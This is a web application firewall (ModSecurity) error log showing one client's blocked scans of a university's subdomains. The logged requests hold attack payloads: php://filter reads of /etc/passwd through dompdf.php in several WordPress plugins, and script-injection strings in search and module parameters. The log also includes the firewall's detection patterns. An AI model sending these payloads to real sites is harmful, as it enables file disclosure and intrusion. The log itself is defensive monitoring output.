[Tue Aug 29 11:53:25.839014 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xcCo-f0AAAoyGzAAAAAI"]
[Tue Aug 29 11:53:25.840778 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAoT7XkAAAAD"]
[Tue Aug 29 11:53:25.844053 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAoz71UAAAAS"]
[Tue Aug 29 11:53:25.847039 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15xcCo-f0AAAoXJxEAAAAP"]
[Tue Aug 29 11:53:25.848422 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAofm7kAAAAX"]
[Tue Aug 29 11:53:26.194472 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search"] [unique_id "ZO15xsCo-f0AAAowNpAAAAAH"]
[Tue Aug 29 11:53:26.407298 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xsCo-f0AAAoqbScAAAAj"]
[Tue Aug 29 11:53:27.327932 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoT7X4AAAAD"]
[Tue Aug 29 11:53:27.476452 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAfWOXQAAAAL"]
[Tue Aug 29 11:53:27.476746 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoW7QAAAAAJ"]
[Tue Aug 29 11:53:27.477613 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAofm7sAAAAX"]
[Tue Aug 29 11:53:27.483364 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoXJxYAAAAP"]
[Tue Aug 29 11:53:27.483966 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAn406EAAAAW"]
[Tue Aug 29 11:53:27.492604 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAog@FoAAAAY"]
[Tue Aug 29 11:53:27.559284 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoesOUAAAAV"]
[Tue Aug 29 11:53:27.560450 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/search"] [unique_id "ZO15x8Co-f0AAAoXJxcAAAAP"]
[Tue Aug 29 11:53:27.735109 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15x8Co-f0AAAofm70AAAAX"]
[Tue Aug 29 11:53:27.774588 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoz71sAAAAS"]
[Tue Aug 29 11:53:27.775324 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoesOYAAAAV"]
[Tue Aug 29 11:53:27.842768 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoT7YQAAAAD"]
[Tue Aug 29 11:53:27.886825 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAowNpUAAAAH"]
[Tue Aug 29 11:53:27.918530 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAox7HEAAAAN"]
[Tue Aug 29 11:53:27.989315 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoLfToAAAAG"]
[Tue Aug 29 11:53:28.039681 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAofm78AAAAX"]
[Tue Aug 29 11:53:28.044917 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAoesOkAAAAV"]
[Tue Aug 29 11:53:28.052118 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAot8QAAAAAn"]
[Tue Aug 29 11:53:28.055376 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAox7HIAAAAN"]
[Tue Aug 29 11:53:28.057562 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAolKXIAAAAe"]
[Tue Aug 29 11:53:28.109458 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAowNpcAAAAH"]
[Tue Aug 29 11:53:28.116775 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAo0gOMAAAAZ"]
[Tue Aug 29 11:53:28.808760 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAor7ssAAAAk"]
